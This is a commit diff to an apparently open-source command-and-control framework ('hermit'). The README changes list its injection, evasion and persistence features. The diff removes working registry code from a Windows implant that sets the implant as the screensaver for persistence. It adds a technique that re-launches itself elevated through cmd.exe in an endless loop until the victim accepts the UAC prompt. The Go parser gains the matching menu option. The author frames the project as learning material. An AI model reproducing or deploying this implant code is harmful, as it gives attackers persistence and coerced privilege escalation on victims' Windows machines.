Added Infinite UAC Prompts for UAC Bypass technique

README.md

@@ -21,6 +21,7 @@ I'm developing this for my learning purpose.
 - HTTPS listener.
 - Multi-Staged Payload
 - Data Encryption.
+- Common Injection Techniques
 - Common Evasion Techniques
 - Common Persistence Techniques
 - Anti-Debug
@@ -37,13 +38,26 @@ I'm developing this for my learning purpose.
 
 ## Requirements
 
-It's assumed that you operate both the C2 server and C2 client on **Linux**.
+It's assumed that you operate both the C2 server and C2 client on **Linux** or **macOS**.
 
-- Linux
+- Linux (especially **Kali Linux**, **Parrot OS**, **Debian** or **Ubuntu**) or macOS
 - Go 1.21+
 
 <br />
 
+## Installation
+
+```sh
+git clone https://github.com/hideckies/hermit.git
+cd hermit
+make server
+./hermit -h
+```
+
+Please see [the installation page](https://hermit.hdks.org/installation/) for more details.
+
+<br />
+
 ## Getting Started
 
 Please see [the docs](https://hermit.hdks.org/getting-started/).  

payload/win/implant/src/core/task/persist.cpp

@@ -88,68 +88,6 @@ namespace Task
                 return L"Error: Failed to set value to registry.";
             }
         }
-        else if (wcscmp(wTechnique.c_str(), L"screensaver") == 0)
-        {
-            // Reference: https://cocomelonc.github.io/tutorial/2022/04/26/malware-pers-2.html
-            HKEY hKey;
-            std::wstring wSubKey = L"Control Panel\\Desktop";
-            const WCHAR* wActivate = L"1"; // 1 => Activate
-            const WCHAR* wTimeOut = L"10";
-
-            if (pState->pProcs->lpRegOpenKeyExW(
-                HKEY_CURRENT_USER,
-                wSubKey.c_str(),
-                0,
-                KEY_WRITE,
-                &hKey
-            ) != ERROR_SUCCESS)
-            {
-                return L"Error: Failed to open key.";
-            }
-
-            // Create new registry keys.
-            if (pState->pProcs->lpRegSetValueExW(
-                hKey,
-                L"ScreenSaveActive",
-                0,
-                REG_SZ,
-                (BYTE*)wActivate,
-                (wcslen(wActivate) + 1) * sizeof(WCHAR)
-            ) != ERROR_SUCCESS)
-            {
-                pState->pProcs->lpRegCloseKey(hKey);
-                return L"Error: Failed to set value to registry.";
-            }
-
-            if (pState->pProcs->lpRegSetValueExW(
-                hKey,
-                L"ScreenSaveTimeOut",
-                0,
-                REG_SZ,
-                (BYTE*)wTimeOut,
-                (wcslen(wTimeOut) + 1) * sizeof(WCHAR)
-            ) != ERROR_SUCCESS)
-            {
-                pState->pProcs->lpRegCloseKey(hKey);
-                return L"Error: Failed to set value to registry.";
-            }
-
-            if (pState->pProcs->lpRegSetValueExW(
-                hKey,
-                L"SCRNSAVE.EXE",
-                0,
-                REG_SZ,
-                (BYTE*)wSelfPath,
-                (wcslen(wSelfPath) + 1) * sizeof(WCHAR)
-            ) != ERROR_SUCCESS)
-            {
-                pState->pProcs->lpRegCloseKey(hKey);
-                return L"Error: Failed to set value to registry.";
-            }
-
-            pState->pProcs->lpRegCloseKey(hKey);
-            return L"Success: The entry has been set to HKCU\\" + wSubKey + L".";
-        }
         else if (wcscmp(wTechnique.c_str(), L"default-file-extension-hijacking") == 0)
         {
             HKEY hKey;

payload/win/implant/src/core/task/uac.cpp

@@ -50,7 +50,7 @@ namespace Task
                 return L"Error: Failed to add registry value for DeletegateExecute.";
             }
 
-            // Start the fodhelper.exe
+            // Start the computerdefaults.exe
             SHELLEXECUTEINFO sei = {sizeof(sei)};
             sei.lpVerb = L"runas";
             sei.lpFile = L"C:\\Windows\\System32\\computerdefaults.exe";
@@ -160,6 +160,29 @@ namespace Task
 
             return L"Success: The fodhelper and another process started successfully.";
         }
+        else if (wcscmp(wTechnique.c_str(), L"infinite-uac-prompts") == 0)
+        {
+            // Reference: https://any.run/cybersecurity-blog/windows11-uac-bypass/
+            while (TRUE)
+            {
+                std::wstring wParams = L"/c " + std::wstring(wSelfPath) + L" && pause";
+
+                SHELLEXECUTEINFO sei = {sizeof(sei)};
+                sei.lpVerb = L"runas";
+                sei.lpFile = L"cmd.exe";
+                sei.lpParameters = wParams.c_str();
+                // sei.hwnd = nullptr;
+                sei.nShow = SW_HIDE;
+
+                if (pState->pProcs->lpShellExecuteExW(&sei))
+                {
+                    return L"Success: The inifinite UAC prompts is executed.";
+                }
+                // If the victim unaccept the UAC prompt, infinite loop until it's accepted...
+            }
+
+            return L"Success: The inifinite UAC prompts is executed.";
+        }
 
         return L"Error: Invalid technique.";
     }

pkg/common/parser/amtaskcommand.go

@@ -667,7 +667,6 @@ func (c *amTaskPersistCmd) Run(
 	items := []string{
 		"runkey",
 		"user-init-mpr-logon-script",
-		"screensaver",
 		"default-file-extension-hijacking",
 		"ifeo",
 		// "scheduled-task",
@@ -1146,6 +1145,7 @@ func (c *amTaskUacCmd) Run(
 		"computerdefaults",
 		"eventvwr",
 		"fodhelper",
+		"infinite-uac-prompts",
 		"(cancel)",
 	})
 	if err != nil {

pkg/server/service/https.go

@@ -69,6 +69,7 @@ func handleImplantCheckIn(serverState *state.ServerState) gin.HandlerFunc {
 			ctx.String(http.StatusBadRequest, "")
 			return
 		}
+
 		var checkInData CheckInData
 		if err := json.Unmarshal(jsonBytes, &checkInData); err != nil {
 			ctx.String(http.StatusBadRequest, "")